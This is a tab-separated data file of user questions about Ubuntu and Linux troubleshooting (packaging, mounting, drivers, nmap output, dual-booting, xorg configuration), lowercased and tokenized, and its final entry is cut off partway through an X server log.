421638	how can i include files in a debian package for use in the postinst script ?	recently after performing an upgrade , and hence having to redo some of the manual configuration changes i 'd performed , e.g . to configs in /etc or /usr/share , i decided i 'd be more strict with myself this time and put all changes i make to my system into packages , so on the next upgrade i can just install my packages and have everything ready to go . my first package is for my custom keymap . following this post : create a .deb package from scripts or binaries i have created a folder for the package and have my keymap listed in the debian/install file , to be installed in /usr/share/x11/xkb/symbols . i 'm also going to need to add the symbols to /usr/share/x11/xkb/evdev.xml for them to be recognised , and thought that it would be better to use patch for this rather than overwriting the file . to reiterate , i want to use patch as the installation method for my alterations to evdev.xml , not to patch package source code using quilt ( which is what i 've found through internet searching ) so i have my keymap in the install file , and a patch command in the postinst file . my problem is that i do n't know how to include the patch files into the package ; after running debuild , the script and keymap are in the deb file , but the diffs are n't , so the postinst script wo n't be able to run . is there a way i can get my patches ( or better , a folder called patches ) into the package , for use during the installatoin ? if possible , i do n't want to install these patches anywhere as they 're only necessary during the installation process . thanks .
421639	udisks2 can not create folder in /media/	i can not mount devices showing up in nautilus listed under devices . error creating directory `/media/ < myusername > ' : permission denied i belive this is a udisks2 ( permission ) issue ... > sudo udisks -- mount /dev/sdc mount failed : error creating moint point : permission denied ... and occured after changing files under /etc/auto.* . i might have deleted entries accidentially . does udisks2 utilize autofs and do i therfore have to add entries in /etc/auto.* ? trying to create a folder with sudo mkdir /media/ < myusername > did also not work due to permission rights , which i find strange . mounting nfs share via autofs does work , however . ls -l / | grep media drwxr-xr-x 4 root root 0 feb 16 13:53 media directory /media/ is empty unless automount populates it with directories as defined in etc/auto.master . mounting /dev/sdc2 via fstab or manually to a differnt directory works without any problems . system information : udisks2 2.1.2-1 linux 3.13.0-8-generic ubuntu 13.10 > less /var/log/syslog | grep automount feb 16 12:54:42 stardust automount [ 3938 ] : key `` storage-400gb '' not found in map source ( s ) . feb 16 13:32:06 stardust automount [ 1113 ] : key `` bjorn '' not found in map source ( s ) . feb 16 13:46:19 stardust automount [ 1113 ] : key `` .hidden '' not found in map source ( s ) . > sudo blkid -o list -w /dev/null device fs_type label mount point uuid -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - /dev/sdb3 ext4 / 3f9d077e-88a2-48eb-9d91-30ff082203fb /dev/sdb4 ext4 /home 93ca1090-a101-44bd-9931-bb012b95aaef /dev/sdb5 swap < swap > 8664c268-26f0-4561-b218-19db15873ab0 /dev/sdc2 ext3 ( not mounted ) c71efa9d-21ae-48ac-9a4d-bd47f13e25f8 possibly related questions : why has ubuntu moved the default mount points ? why are the default permissions for /media/username root : root ? http : //www.freedesktop.org/wiki/software/udisks/ edit : it seems that an entry in /etc/auto.master was the reason that udisk did not get write permissions to /media/ . removing this entry fixed the umount permission problem .
421642	libc.so.6 : version `glibc_2.14 ' not found	whenever i try to run a program from the terminal ( apt-get for example ) i get a : apt-get : /lib/x86_64-linux-gnu/libc.so.6 : version `glibc_2.14 ' not found ( required by /usr/lib/libstdc++.so.6 ) not just with apt-get , but with gimp-2.8 , vlc , and other programs . i 'll always get the message from before , except with a few simple programs like ls . not to mention , i can run gimp , or vlc , or install any program through software center or gdebi through any gui system , be it unity 's menu , or nautilus 's open with . but when it comes to running these programs through a terminal it never works , and i always get that previous error message . i mess with my system a lot , so i might have broke something . also i think i went and modified /etc/sudoers file , and i have been hibernating my computer a lot , does that have any effect ? i 'm a newbie in dealing with linux , so i have no idea what caused that problem .
421643	nmap ( 6.40 ) xml output not showing ports , only os	so im trying to get an inventory list of my home network ( just for fun at first ) i chose this simple nmap scan for starters : sudo nmap -ox homscan.xml -v -r 192.168.1.100-110 192.168.1.150 when doing this , i get a very simple output in the terminal , showing me a list of all open ports on each machine ( for some reason port 80 is n't in any of those ) looking at the homescan.xml i noticed it was empty now learning nmap i tried getting the os info so i added -a , for os fingerprinting and this time my terminal input had the os info as well ( some successful and some only attempts ) but the xml output file was not empty this time , displaying only the os information . why is that ? and how do i make the xml show me a nice readable inventory list which i can later utilize to me wants ? ( ex : pull only os devices or only gigabyte mobos and such ) ty
421645	imwheel destroys back / forth navigation buttons from my mouse	i installed imwheel correctly with sudo apt-get install imwheel . afterwards i did insert this : '' . * '' none , up , up , 10 none , down , down , 10 in my ~/.imwheelrc file . the scrolling works perfectly now . however the back / forth navigation buttons from my mouse ( logitecg g700 ) do n't work anymore . if i kill the process with killall imwheel , the buttons work . do you have any suggestions / ideas how to fix this ? i 'd like to use imwheel .
421646	i installed maas server , would like to add one node with a different ubuntu release , how should i do it ?	i looked around , it seems lots of information , is there a step by step instruction somewhere ? i tried to add a vm-node manually , it is in commissioning state , what should i prepare before starting using juju ? everywhere the example is with 10.x.x.x , guess that ip address should be based on my own network . any help would be appreciated .
421648	how to check if last command succeeded and make that command auto accept prompts ?	i am working a script to create a raid5 array . the question is how to put the command in a if ( to see if the command succeeded ) , and when the script ask to continue creating array it will auto say yes . here is the command : mdadm -- create -- verbose /dev/md0 -- level=5 -- raid-devices=3 /dev/sdc1 /dev/sdd1 /dev/sde1 -- spare-devices=1 /dev/sdf1
421650	how to monitoring bandwidth usage minus the local traffic ?	there is much software to monitor monthly bandwidth usage on interface eth0 . do they also count the lan traffic ? i want to ignore the lan traffic while monitoring bandwidth . networx is a good software for window platform . i want similar tool for ubuntu 12.04 .
421655	how to show database in phpmyadmin in web browser	excuse me , guys . can you help me , how to show database in phpmyadmin in web browser ( in tabular form ) in ubuntu 13.10 ? i 've installed phpmyadmin mysql-server apache2 and php5 ...
421657	how do i get a search button on dock applications ?	i 've used docky and glx-dock ( because i want a dock on the bottom , not the side ) but i ca n't figure out how to add the search button to either of them . i 'd like either suggestions for dock apps that will enable bottom docks as well as the search app on the bottom of the dock .
421659	what is the best alternative for dreamweaver ?	i have been searching long and hard for an alternative to dreamweaver that is not wysiwyg and that functions the same way dreamweaver does . is there any program out there in the software center or online that might help . i used kompozer which i loved but it is no longer in the software center ( using ubuntu 13.10 ) . i would like to help work on making kompozer better if possible but maybe there is an alternative that i havent seen yet . anyone have any good ideas ?
421662	how to use an android phone as computer speaker	is there a way to use a plugged in android device as usb computer speaker ?
421663	cat : write error : broken pipe	i 'm running a command : cat urls.txt | xargs -l 1 -p 5 timeout 40 wget this downloads all the urls in urls.txt this used to work fine , but recently i changed the urls i am downloading from something like : domain.com/54f-5g4/ to something like domain.com/this-that/ and for some reason i am now getting : cat : write error : broken pipe i 've looked at the commands being executed and they all look fine , i.e . no unescaped characters . does anyone have any idea what the problem may be ? or how to get more debugging information ? i believe the problem is with commands after the pipe . update : i found the error . it looks like i accidently typed a ' in my urls.txt file . if you are getting this error , you have a problem with your command after the pipe .
421664	apt-get update always stuck at getting release.gpg	while i run apt-get update on ubuntu 12.04 , i got the following output ( partially ) : get:1985 http : //archive.ubuntu.com precise release.gpg [ 28.9 kb ] ... my sources.list file is not modified and i use the main server as the repository . i tried to remove /var/lib/apt/lists/* and update again but failed . i retrieved the release.gpg file manually : http : //archive.ubuntu.com/ubuntu/ubuntu/dists/precise/release.gpg found that the file size is 198 instead of 28.9kb , any ideas ? thank you very much !
421668	connecting to airport time capsule disk from ubuntu 13.10	i use apple and ubuntu products at the same time , but i could not connect to my airport time capsule disk from ubuntu 13.10 . files can explore the disk but because of the afp file sharing thing does n't allow me to connect to the disk . can anyone tell me how to connect to airport time capsule disk ? thank ! jimmy
421669	what graphic card i use & how to switch between my cards ?	i have asus x550cc-xx209 with installed xubuntu . my question is how do i know what gpu i use , intel or nvidia.and if i use intel , how to switch to nvidia card.i 'm new linux user , so please do n't use difficult terms.thanks , and sorry for my bad english .
421671	microphone - static background noise suppression	my soundcard is realtek alc 892 . on windows 7 i use official realtek drivers , on linux i use pulseaudio ( on ubuntu 13.10 ) . on both windows and linux , when i enable microphone boost +30db ( required because my microphone is quiet ) , i get very annoying and loud background noise ( i also confirmed the background noise with audacity on both systems ) . however , windows realtek drivers have noise suppression option which works ( after enabling it , audacity shows no background noise and my ears also confirm that there is no background noise ) . my question is how can i enable background noise suppression in alsa/pulseaudio ? is there any module i can install or maybe there is a setting for it that can be enabled in config file ? i ca n't find solution for it and this is the only thing that prevents me from switching to linux completely - as i talk using microphone a lot and on windows the realtek software removes the background noise completely and pulseaudio does n't remove it , which means the recorded voice on linux is very bad . i know i could buy better soundcard and microphone , but as i said , windows realtek drivers remove the noise on software level in real time ( ie no noise when talking on teamspeak3/steam/whatever voip programme ) so i hope that there is such option on linux as well . thanks in advance ! this is also crossposted on unix stackexchange
421676	run full ubuntu installation from uefi bootable usb stick	similar to a previous questioner who did not appear to get an appropriate answer ( being referred to a page that did not relate to his specific need ) i wish to run a full 64bit version of ubuntu 13.10 from my 64g usb3 stick . ok , i have actually done this , no problem . but the issue is i would like to be able to boot from this large usb stick onto my uefi laptop , running win 8.1 , which , of course wo n't recognise it without me changing the setup in a way that wo n't let me run win 8.1 without changing the setup back again . messy . i 've already created a 'live ' 64bit ubuntu 64bit 13.10 installation on another usb stick which i definitely know i could use to install ubuntu onto a new partition on my uefi - secure boot win 8.1 machine . but i do n't want to do that . i simply want to run full ubuntu from my large format usb stick on that machine - and i do n't know a way of making that stick uefi bootable at the same time as installing ubuntu on it again ( or diddling with the existing installation , if necessary ) . the problem is that i 'm obliged to create any new installation on this stick via an old non-uefi computer . i ca n't do it via my win 8.1 machine . so i just to not get any option via the 'something else ' installation method to choose efi . phew ! anybody know what i can do ( apart from take a running jump ) ? david
421677	prevent window from resizing when pulled away from a grid position	i use the compiz keyboard shortcuts ctrl-alt- [ numpad ] to position my windows on the screen . however , when i use the mouse to reposition such a `` gridded '' window , the window is resized to its previous ( ? ) size , which results in an annoying offset underneath the mouse pointer , making the window hard to position correctly - especially on a laptop screen . is there any way to prevent this behavior ? i am currently using a the following command with a keybinding to `` unlock '' the window beforehand to a predefined size , but this does n't work for all maximized windows ( eg . console ) and i would prefer a non-hack solution : wmctrl -r : active : -b remove , maximized_vert , maximized_horz & -e 0,400,200,600,400 edit : i have found an option in the compizconfig settings manager `` snap windows back to original size '' , but deactivating this crashed unity ( all toolbars removed from all windows ) which i was only able to fix by reinstalling the `` unity-lens- '' applications as per this answer . `` unity -- reset '' crashes , with the same error as given in the link . is there another way to achive what i am looking for ?
421678	touchpad not detected in ubuntu 13.10 ( samsung series 3 np350v5c )	touchpad is not detected at all : > xinput list ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ logitech usb receiver id=9 [ slave pointer ( 2 ) ] ⎜ ↳ logitech usb receiver id=10 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ power button id=8 [ slave keyboard ( 3 ) ] ↳ webcam sc-13hdl11939n id=11 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=12 [ slave keyboard ( 3 ) ]
421683	problems installing custom xubuntu iso : `` no space left on device ''	i wanted to make a custom iso , so i used the ubuntu customization kit ( uck ) . the iso was created and i used unetbootin to install it on a 4.0gb sandisk flash drive . however , when i tried to boot from the flash drive , i got a `` no space left on device '' error . i ran the `` check disk for defects '' option and nothing was found . the iso created was ~1gb and the flash drive had 2.6gb of free space after the installation . what can i do to make my iso bootable ? what i have tried : re-installing the iso . trying to boot the flash drive from a different computer testing with qemu , but all i got was a black screen note : the computer was able to boot other flash drives and the the flash drive was able to be booted with a different iso . thanks in advance .
421684	ca n't access apache error logs	my ubuntu vitual server we n't offline . i rebooted it and now want to debug what happened . i can browse to /etc/log but if i try cd apache2 it says permission denied . i 'm sure my user account has priviliges . i also tried sudo cd apache2 which gives the the error sudo : cd : command not found how can i access the apache logs ? i also tried via sftp without success ps i am new to linux and virtual servers , but i am keen to learn everything i can .
421691	basics about nvidia gpu and graphics performance	well , i 'm new in this os , and i already love it . before i had win7 but i 'm not coming back . i installed it yesterday in my laptop , a hp pavilion dv4-1528la with a gpu nvidia geforce 105m . installed the ubuntu 12.04 lts x64 , and so far everything is working properly . but graphics are a bit slower ( not so much , just minimum lags ) , so i went ahead and searched around and found that gpu drivers are not installed by ubuntu since those are not open software . i went into my system settings , checked the `` additional drivers '' section , and it found 4 of them to be installed , all 4 of them nvidia-related , although all of them seemed to be the same just different versions . i installed the first one ( i guess the most recent one ) , and restarted , and the notification in the menu bar disappeared . now , i was expecting to find a section where to setup the graphics from a nvidia manager or something ( just like it was in w7 , to improve performance and control display settings and all of that ) , that use to come with the driver , 多am i right ? ... well , i 'm not able to find that section so i 'm not sure if gpu is working or not . in the forums i 've been into , they talk about not installing drivers as standalone apps , or installing some other things like `` bumblebee '' to control nvidia graphics , but since is my first time in linux , i do n't want to mess up something i do n't know how to reverse later . any basic help step-by-step would be greatfully appreciated ! edit : i 've been checking extra in here and all three commands work fine , so i guess now that gpu is installed and recognized and working properly , but i guess the question now is 多how to enter to gpu settings to control display and graphics performance ?
421693	dual-booting windows 7 and ubuntu : last step problem with easybcd	i am installing ubuntu 12.04 on a laptop that had pre-installed windows 7 . the computer has one hard drive ( 1 tb ssd ) , which contained the following partitions : 2gb = system partition , ( no letter assigned ) the rest = c : , boot windows 7 partition to install ubuntu alongside with my windows 7 , i was basically following the instructions that i found here : http : //www.linuxbsdos.com/2012/05/17/how-to-dual-boot-ubuntu-12-04-and-windows-7/ i successfully shrunk the c : partition by ~450gb . then , in the beginning of the ubuntu installation process , ( using a dvd image disk ) , i created 4 new partitions for the linux system ( /boot , / , /home , and swap space ) . then i told the installer program to put the boot loader to /dev/sda5 ( /boot partition ) , since i planned to use windows loader to control the dual booting . the rest of the installation seemed to have worked fine , i re-started the computer and got back to my windows 7 system ( which was expected , as i still had to set up the dual boot from windows . ) however , that 's where i have a problem . according to the above-mentioned instructions , i should be able to use easybcd to set up dual boot configuration . however , easybcd does n't find any bcd records in my system ( not even the one for windows 7 ) . it suggests me to find the file manually , however how can i do it ? i am also being cautious as not to damage my existing windows installation , by randomly trying things i do not understand . the error that easybcd throws in , reads as follows : '' the boot configuration data store could not be opened . the system can not find the file specified . would you like to manually load a bcd registry for easybcd to manage ? please note that easybcd requires the windows vista/7 bootloader , and will not work in xp-only environments '' . i have checked a few related pages here , but none seems to contain exactly my case . any help much appreciated ! ps maybe there is some other dual boot software , that i could use instead of easybcd ?
421694	system can not return display after locking	my ubuntu 13.10 works great except for one issue . when i lock the system and try to unlock after long time i don not get any display on the screen , no matter what key i hit . kindly suggest a fix . thank you
421699	authentication error when updating	how can i resolve the error shown in the photo . i have changed my desktop to gnome and managed to update but when i use this desktop my os refuses to update . when i update with plasma kde , this works .
421703	installing ubuntu on a rebuilt pc without any operating system : no success	i want to use ubuntu on my rebuilt system -- - new hd , new motherboard , new power unit , old case , and old optical drive . all seem to work well but i 'm not sure whether i need a preformatted ubuntu disk .
421705	how to lock session from awesome	i wish to have a simple locking feature in awesome on ubuntu 13.10 , both on demand and on inactivity .
421706	pops and crackles problem with music files streamed to sound system	apologies if this has been asked elsewhere . i did look but could n't find what i needed . i have copied my music collection from osx to ubuntu . my music is a mixture of mp3 , aac , alac and aiff files . the files are stored on a new wd green 3tb drive mounted as /media/ i have an arcam mwave usb sound device in the back of the computer and an arcam dac sitting behind the sound system . ubuntu does recognise this and sends sound out through it . under osx there is no problem at all ! ! ! with ubuntu there is constant clicking , popping and other artifacts getting in the way of the music . thinking it was hardware i changed the audio leads and the power supply but still the issue remains . out of curiosity i played music directly from a cd on the ubuntu machine and it worked fine . no pops , crackles , etc . the problem , therefore , seems to be when playing music files from the hard drive . so i thought , lets rip a cd with ubuntu and play the files it creates . still the pops and crackles so the source files should be assumed okay . i do n't know enough about the sound system on ubuntu , the relationship between alsa and pulseaudio and how it all fits together . equally i do n't know how to resolve my problem . the new pc is supposed to be my media centre machine and was built with that in mind . all help appreciated . update - i have tracked the source of the problem to ubuntu 's handling of the usb soundcard ( arcam wave ) . using the internal intel sound card i can not reproduce the problem . the issue is only when using the usb sound device . i have searched around on the net and found many similar issues regarding usb sound cards for earlier versions of ubuntu but nothing for 13.10 . equally suggestions of recompiling kernels etc . fills me with a little dread . does anyone have any useful and satisfactory solutions to the problem ?
421707	problems joining ubuntu desktop to domain ubuntu server pdc	i have a problem joining the ubuntu 12.04 pdc domain with ubuntu 12.04 lts desktop machine . linux~ # net rpc join servername -u rootname can not join as standalone machine both machines are in same subnet , can ping in both directions . windows clients can join the domain w/o problems .
421709	when i try to install from cd it crashes showing screeds of text	i need some help ! i 've made a boot disc , but every time i boot i just get pages and pages of text ( in a rather odd font ) and then it just stops . i sometimes can get the first options page - try ubuntu without installing , install ubuntu etc , but it then just displays the endless text ( mainly about system issues like recognising my usb keyboard and mouse ) regardless of which option i pick , and then it stops . i 've done two cds and both do the same thing . i 've also opened the cd from windows 7 and installed the `` help boot from cd '' option . what am i doing wrong ? if it 's any help it 's a sony viao desktop ( not laptop ) .
421712	comparing the contents of two directories using bash	i have two directories that should contain the same files and have the same directory structure . i think that something is missing in one of these directories . using the bash shell , is there a way to compare my directories and see if one of them is missing files that are present in the other ?
421720	not a single software download from ubuntu software centre	i am using ubuntu 12.04 and trying to install vlc via ubuntu software centre . when i press install , the following prompt shows up **package dependencies can not be resolved** this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time . vlc : depends : vlc-nox ( = 2.0.8+git20140211+r49186+4+5~ubuntu12.04.1 ) but 2.0.8+git20140211+r49186+4+5~ubuntu12.04.1 is to be installed depends : libavcodec-extra-53 ( > = 4:0.8-1~ ) but 4:0.8.10ubuntu0.12.04.1 is to be installed depends : libavutil-extra-51 ( > = 4:0.8-1~ ) but 4:0.8.10ubuntu0.12.04.1 is to be installed depends : libc6 ( > = 2.15 ) but 2.15-0ubuntu10.5 is to be installed depends : libfreetype6 ( > = 2.2.1 ) but 2.4.8-1ubuntu2.1 is to be installed depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.6.3-1ubuntu5 is to be installed depends : libqtcore4 ( > = 4:4.8.0 ) but 4:4.8.1-0ubuntu4.6 is to be installed depends : libqtgui4 ( > = 4:4.7.0~beta1 ) but 4:4.8.1-0ubuntu4.6 is to be installed depends : libsdl-image1.2 ( > = 1.2.10 ) but it is not going to be installed depends : libstdc++6 ( > = 4.6 ) but 4.6.3-1ubuntu5 is to be installed depends : libtar0 but it is not going to be installed depends : libva-x11-1 ( > 1.0.15~ ) but it is not going to be installed depends : libva1 ( > 1.0.15~ ) but it is not going to be installed depends : libxcb-keysyms1 ( > = 0.3.8 ) but it is not going to be installed depends : zlib1g ( > = 1:1.2.3.3.dfsg ) but 1:1.2.3.4.dfsg-3ubuntu4 is to be installed please someone help me ... .
421722	installing xubuntu using wubi	i am trying to setup a dual boot system with win xp sp3 and xubuntu from the wubi . i have winxp on a drive partition ( c : ) and i am installing xubuntu to a drive partition ( d : ) both of which have 293gb capacity with d : being a fresh format . wubi installs fine from windows and gets to the point where it needs to reboot . i click reboot and then when the dual boot option comes up i choose xubuntu . this is where the issue arises . it loads into the xubuntu loading screen then states it can not find the iso file and therefore can not finish installation . i 'm lost as obviously the iso was downloaded by wubi . can anyone help ?
421727	installing cudasw++3.0 : nvcc not found	i ca n't install cudasw++3.0 . the error message i get is : asmaa @ ubuntu : ~/documents/cudasw++v3.0.14 $ make mkdir -p objs nvcc -o3 -arch sm_30 -- ptxas-options=-v -use_fast_math -xcompiler -funroll-loops -xcompiler -msse2 -dmax_seq_length_threshold=3072 -i . -i ~/nvidia_gpu_computing_sdk//c/common/inc -c cfastafile.cpp -o objs/cfastafile.cpp.o /bin/sh : 1 : nvcc : not found make : *** [ objs/cfastafile.cpp.o ] error 127 my gpu card is a gt 630m , fermi architecture . what can i do to fix this ?
421729	opentype features in libreoffice	is it possible to use opentype 's features like ligatures in libreoffice ? if yes , how ? because as far as i know , in ubuntu and linux in general , these features are available only for graphite ( aka smart ) fonts like linux libertine g ( a free graphite font available here ) . opentype fonts have the same features but not accessible in libreoffice . i 'd explain more if requested . please notice the differences in the snapshot . ligatures are automatically being applied in graphite fonts . word arthur shows smallcaps feature .
421730	xorg.conf changes from nvidia-setting have no effect after reboot	i have upgraded from 13.04 to 13.10 today and everything works smooth apart from one thing . i have a dual monitor setup and every time reboot the screens have switched places ( left screen on right monitor and vice versa ) . i have correctly created an xorg.conf which is shown below . i have tried all the solutions which are suggested in theses two posts : nvidia-settings lost after reboot nvidia drivers seem to ignore customized xorg.conf in 13.10 ? how to configure ? including checking for ~/.config/monitor.xml which i do n't have . loading the nvidia-setting at runtime using nvidia-settings -l which does n't do anything . but that kinda makes sense to me since the .nvidia-setting-rc does n't really have any info about screen positions . and since i 'm running lxde as my desktop environment `` preferences- > monitor settings '' is only concerned with screen resolution , not screen position . now here is the odd thing : when lightdm loads up the screens are initially in the correct order ( as specified in the xorg.conf ) and then switch order after a couple of secounds . in my xorg.0.log i found the following line [ 11.806 ] ( ii ) nvidia ( 0 ) : setting mode `` dvi-i-0 : nvidia-auto-select @ 1680x1050 +0+0 , dvi-d-0 : nvidia-auto-select @ 1680x1050 +1680+0 '' which i believe could very well be the culprit . it seems as if the nvidia driver overrides the settings in xorg.conf after the fact even though i 'm not starting nvidia-settings at startup as far as i know . edit : i just upgraded from nvidia-304 to nvidia-319 and now my suspicions a confirmed because the x-server boot log is now a little bit clearer . the relevant lines are : [ 6.460 ] ( ** ) nvidia ( 0 ) : option `` metamodes '' `` crt : nvidia-auto-select +1680+0 , dfp : nvidia-auto-select +0+0 '' options are correctly read from xorg.conf [ 6.908 ] ( ii ) nvidia ( 0 ) : setting mode `` crt : nvidia-auto-select+1680+0 , dfp : nvidia-auto-select+0+0 '' and correctly set [ 11.197 ] ( ii ) nvidia ( 0 ) : setting mode `` dvi-i-0 : nvidia-auto-select @ 1680x1050 +0+0 { viewportin=1680x1050 , viewportout=1680x1050+0+0 } , dvi-d-0 : nvidia-auto-select @ 1680x1050 +0+0 { viewportin=1680x1050 , viewportout=1680x1050+0+0 } '' [ 11.222 ] ( ii ) nvidia ( 0 ) : setting mode `` dvi-i-0 : nvidia-auto-select @ 1680x1050 +0+0 { viewportin=1680x1050 , viewportout=1680x1050+0+0 } , dvi-d-0 : nvidia-auto-select @ 1680x1050 +1680+0 { viewportin=1680x1050 , viewportout=1680x1050+0+0 } '' and then later overridden by the nvidia driver for apparently no reason . any ideas anybody ? any help would be much appreciated . xorg.conf # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 304.88 ( buildd @ panlong ) thu jul 11 10:40:14 utc 2013 section `` serverlayout '' identifier `` default layout '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` samsung syncmaster '' horizsync 30.0 - 81.0 vertrefresh 56.0 - 75.0 endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gtx 650 ti '' option `` nvidiaxineramainfoorder '' `` dfp-1 , crt-0 '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` stereo '' `` 0 '' option `` nvidiaxineramainfoorder '' `` dfp-1 , crt-0 '' option `` metamodes '' `` crt-0 : nvidia-auto-select +1680+0 , dfp-1 : nvidia-auto-select +0+0 '' subsection `` display '' depth 24 endsubsection endsection edit 2 : what i found out is that the log message which signals the override of the xorg.conf settings is one that is caused by a call to xrandr ( as i 'm doing this myself from the commandline to set the screens in the correct order ) . below you 'll find my x-server log file . please be aware that the very last two entries at approx . 31.5 secs are caused by me calling xrandr from the commandline with the correct settings . [ 6.376 ] x.org x server 1.14.5 release date : 2013-12-12 [ 6.376 ] x protocol version 11 , revision 0 [ 6.376 ] build operating system : linux 3.2.0-37-generic x86_64 ubuntu [ 6.376 ] current operating system : linux xyz 3.11.0-15-generic # 25-ubuntu smp thu jan 30 17:22:01 utc 2014 x86_64 [ 6.376 ] kernel command line : boot_image=/vmlinuz-3.11.0-15-generic root=xyz ro splash quiet [ 6.376 ] build date : 17 december 2013 10:06:15am [ 6.376 ] xorg-server 2:1.14.5-1ubuntu2~saucy1 ( for technical support please see http : //www.ubuntu.com/support ) [ 6.376 ] current version of pixman : 0.30.2 [ 6.376 ] before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . [ 6.376 ] markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . [ 6.376 ] ( == ) log file : `` /var/log/xorg.0.log '' , time : sat feb 22 09:14:56 2014 [ 6.376 ] ( == ) using config file : `` /etc/x11/xorg.conf '' [ 6.376 ] ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' [ 6.376 ] ( == ) serverlayout `` layout0 '' [ 6.377 ] ( ** ) | -- > screen `` screen0 '' ( 0 ) [ 6.377 ] ( ** ) | | -- > monitor `` monitor0 '' [ 6.377 ] ( ** ) | | -- > device `` device0 '' [ 6.377 ] ( ** ) | -- > input device `` keyboard0 '' [ 6.377 ] ( ** ) | -- > input device `` mouse0 '' [ 6.377 ] ( ** ) option `` xinerama '' `` 0 '' [ 6.377 ] ( == ) automatically adding devices [ 6.377 ] ( == ) automatically enabling devices [ 6.377 ] ( == ) automatically adding gpu devices [ 6.377 ] ( ww ) the directory `` /usr/share/fonts/x11/cyrillic '' does not exist . [ 6.377 ] entry deleted from font path . [ 6.377 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi/ '' does not exist . [ 6.377 ] entry deleted from font path . [ 6.377 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi '' does not exist . [ 6.377 ] entry deleted from font path . [ 6.377 ] ( == ) fontpath set to : /usr/share/fonts/x11/misc , /usr/share/fonts/x11/100dpi/ : unscaled , /usr/share/fonts/x11/type1 , /usr/share/fonts/x11/100dpi , built-ins [ 6.377 ] ( == ) modulepath set to `` /usr/lib/x86_64-linux-gnu/xorg/extra-modules , /usr/lib/xorg/extra-modules , /usr/lib/xorg/modules '' [ 6.377 ] ( ww ) hotplugging is on , devices using drivers 'kbd ' , 'mouse ' or 'vmmouse ' will be disabled . [ 6.377 ] ( ww ) disabling keyboard0 [ 6.377 ] ( ww ) disabling mouse0 [ 6.377 ] ( ii ) loader magic : 0x7f752fd38d20 [ 6.377 ] ( ii ) module abi versions : [ 6.377 ] x.org ansi c emulation : 0.4 [ 6.377 ] x.org video driver : 14.1 [ 6.377 ] x.org xinput driver : 19.1 [ 6.377 ] x.org server extension : 7.0 [ 6.377 ] ( ii ) xfree86 : adding drm device ( /dev/dri/card0 ) [ 6.378 ] ( -- ) pci : * ( 0:1:0:0 ) 10de:11c6:10b0:11c6 rev 161 , mem @ 0xf6000000/16777216 , 0xe8000000/134217728 , 0xf0000000/33554432 , i/o @ 0x0000e000/128 , bios @ 0x ? ? ? ? ? ? ? ? /524288 [ 6.378 ] ( ii ) open acpi successful ( /var/run/acpid.socket ) [ 6.378 ] initializing built-in extension generic event extension [ 6.378 ] initializing built-in extension shape [ 6.378 ] initializing built-in extension mit-shm [ 6.378 ] initializing built-in extension xinputextension [ 6.378 ] initializing built-in extension xtest [ 6.378 ] initializing built-in extension big-requests [ 6.378 ] initializing built-in extension sync [ 6.378 ] initializing built-in extension xkeyboard [ 6.378 ] initializing built-in extension xc-misc [ 6.378 ] initializing built-in extension security [ 6.378 ] initializing built-in extension xinerama [ 6.378 ] initializing built-in extension xfixes [ 6.378 ] initializing built-in extension render [ 6.378 ] initializing built-in extension randr [ 6.378 ] initializing built-in extension composite [ 6.378 ] initializing built-in extension damage [ 6.378 ] initializing built-in extension mit-screen-saver [ 6.378 ] initializing built-in extension double-buffer [ 6.378 ] initializing built-in extension record [ 6.378 ] initializing built-in extension dpms [ 6.378 ] initializing built-in extension x-resource [ 6.378 ] initializing built-in extension xvideo [ 6.378 ] initializing built-in extension xvideo-motioncompensation [ 6.378 ] initializing built-in extension selinux [ 6.378 ] initializing built-in extension xfree86-vidmodeextension [ 6.378 ] initializing built-in extension xfree86-dga [ 6.378 ] initializing built-in extension xfree86-dri [ 6.378 ] initializing built-in extension dri2 [ 6.378 ] ( ii ) `` glx '' will be loaded by default . [ 6.378 ] ( ww ) `` xmir '' is not to be loaded by default . skipping . [ 6.378 ] ( ii ) loadmodule : `` dri2 '' [ 6.378 ] ( ii ) module `` dri2 '' already built-in [ 6.378 ] ( ii ) loadmodule : `` glamoregl '' [ 6.378 ] ( ii ) loading /usr/lib/xorg/modules/libglamoregl.so [ 6.494 ] ( ii ) module glamoregl : vendor= '' x.org foundation '' [ 6.494 ] compiled for 1.14.3 , module version = 0.5.1 [ 6.494 ] abi class : x.org ansi c emulation , version 0.4 [ 6.494 ] ( ii ) loadmodule : `` glx '' [ 6.494 ] ( ii ) loading /usr/lib/x86_64-linux-gnu/xorg/extra-modules/libglx.so [ 6.533 ] ( ii ) module glx : vendor= '' nvidia corporation '' [ 6.534 ] compiled for 4.0.2 , module version = 1.0.0 [ 6.534 ] module class : x.org server extension [ 6.534 ] ( ii ) 